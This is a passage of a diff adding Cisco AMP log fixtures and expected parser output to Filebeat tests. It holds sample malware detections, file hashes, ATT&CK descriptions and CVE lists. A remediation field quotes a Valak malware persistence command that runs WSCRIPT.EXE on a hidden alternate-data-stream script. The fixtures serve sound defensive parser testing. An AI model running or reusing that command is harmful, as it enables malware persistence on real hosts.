Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json new file mode 100644 index 000000000000..7cd87985c4a6 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json @@ -0,0 +1,6482 @@ +[ + { + "@timestamp": "2021-01-15T11:59:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "87:c2:d9:a2:8c:74" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296344, + "cisco.amp.related.mac": [ + "87:c2:d9:a2:8c:74" + ], + "cisco.amp.tactics": [ + { + "description": "

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics\u2019 techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n", + "external_id": "TA0005", + "mitre_name": "tactic", + "mitre_url": "https://attack.mitre.org/tactics/TA0005", + "name": "Defense Evasion" + } + ], + "cisco.amp.techniques": [ + { + "data_sources": "File monitoring, Process monitoring, Process command-line parameters", + "description": "

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n", + "external_id": "T1005", + "mitre_name": "technique", + "mitre_url": "https://attack.mitre.org/techniques/T1005", + "name": "Data from Local System", + "permissions": "", + "platforms": "Linux, macOS, Windows", + "system_requirements": "Privileges to access certain files and directories", + "tactics_names": "Collection" + }, + { + "data_sources": "File monitoring, Process monitoring, Process command-line parameters, Windows event logs", + "description": "

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n", + "external_id": "T1053", + "mitre_name": "technique", + "mitre_url": "https://attack.mitre.org/techniques/T1053", + "name": "Scheduled Task/Job", + "permissions": "Administrator, SYSTEM, User", + "platforms": "Windows, Linux, macOS", + "tactics_names": "Execution, Persistence, Privilege Escalation" + }, + { + "data_sources": "Process monitoring, File monitoring, Process command-line parameters", + "description": "

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n", + "external_id": "T1064", + "mitre_name": "technique", + "mitre_url": "https://attack.mitre.org/techniques/T1064", + "name": "Scripting", + "permissions": "User", + "platforms": "Linux, macOS, Windows", + "tactics_names": "Defense Evasion, Execution" + } + ], + "cisco.amp.threat_hunting.incident_end_time": "2020-06-18T11:12:50.000Z", + "cisco.amp.threat_hunting.incident_hunt_guid": "4bdbaf20-020f-4bb5-9da9-585da0e07817", + "cisco.amp.threat_hunting.incident_id": 416, + "cisco.amp.threat_hunting.incident_remediation": "We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n - Review all activity performed by the user\r\n - Upload any suspicious files to ThreatGrid for analysis\r\n - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.", + "cisco.amp.threat_hunting.incident_report_guid": "6e5292d5-248c-49dc-839d-201bcba64562", + "cisco.amp.threat_hunting.incident_start_time": "2021-01-15T10:48:08.000Z", + "cisco.amp.threat_hunting.incident_summary": "The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. Based on the event details listed and the techniques used, we recommend the host in question be investigated further.", + "cisco.amp.threat_hunting.incident_title": "Valak Variant", + "cisco.amp.threat_hunting.severity": "critical", + "cisco.amp.threat_hunting.tactics": [ + { + "description": "

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics\u2019 techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n", + "external_id": "TA0005", + "mitre_name": "tactic", + "mitre_url": "https://attack.mitre.org/tactics/TA0005", + "name": "Defense Evasion" + } + ], + "cisco.amp.threat_hunting.techniques": [ + { + "data_sources": "File monitoring, Process monitoring, Process command-line parameters", + "description": "

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n", + "external_id": "T1005", + "mitre_name": "technique", + "mitre_url": "https://attack.mitre.org/techniques/T1005", + "name": "Data from Local System", + "permissions": "", + "platforms": "Linux, macOS, Windows", + "system_requirements": "Privileges to access certain files and directories", + "tactics_names": "Collection" + }, + { + "data_sources": "File monitoring, Process monitoring, Process command-line parameters, Windows event logs", + "description": "

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n", + "external_id": "T1053", + "mitre_name": "technique", + "mitre_url": "https://attack.mitre.org/techniques/T1053", + "name": "Scheduled Task/Job", + "permissions": "Administrator, SYSTEM, User", + "platforms": "Windows, Linux, macOS", + "tactics_names": "Execution, Persistence, Privilege Escalation" + }, + { + "data_sources": "Process monitoring, File monitoring, Process command-line parameters", + "description": "

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n", + "external_id": "T1064", + "mitre_name": "technique", + "mitre_url": "https://attack.mitre.org/techniques/T1064", + "name": "Scripting", + "permissions": "User", + "platforms": "Linux, macOS, Windows", + "tactics_names": "Defense Evasion, Execution" + } + ], + "cisco.amp.timestamp_nanoseconds": 155518026, + "event.action": "SecureX Threat Hunting Incident", + "event.dataset": "cisco.amp", + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 4, + "fileset.name": "amp", + "host.hostname": "Demo_Threat_Hunting", + "host.name": "Demo_Threat_Hunting", + "input.type": "log", + "log.offset": 0, + "related.hosts": [ + "Demo_Threat_Hunting" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T11:20:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e1:e5:94:ea:a5:44" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.GenericKD:ZVETJ.18gs.1201", + "cisco.amp.detection_id": "6180352115244793858", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e1:e5:94:ea:a5:44" + ], + "cisco.amp.timestamp_nanoseconds": 279000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6180352115244794000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e2f5dcd966e26d54329e8d79c7201652", + "file.hash.sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48", + "file.hash.sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40", + "file.name": "wsymqyv90.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 12475, + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 4040, + "related.hash": [ + "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40", + "e2f5dcd966e26d54329e8d79c7201652", + "70aef829bec17195e6c8ec0e6cba0ed39f97ba48" + ], + "related.hosts": [ + "Demo_Upatre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T11:20:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e1:e5:94:ea:a5:44" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.GenericKD:ZVETJ.18gs.1201", + "cisco.amp.detection_id": "6180351977805840385", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e1:e5:94:ea:a5:44" + ], + "cisco.amp.timestamp_nanoseconds": 548000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6180351977805840000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e2f5dcd966e26d54329e8d79c7201652", + "file.hash.sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48", + "file.hash.sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40", + "file.name": "wsymqyv90.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe", + "fileset.name": "amp", + 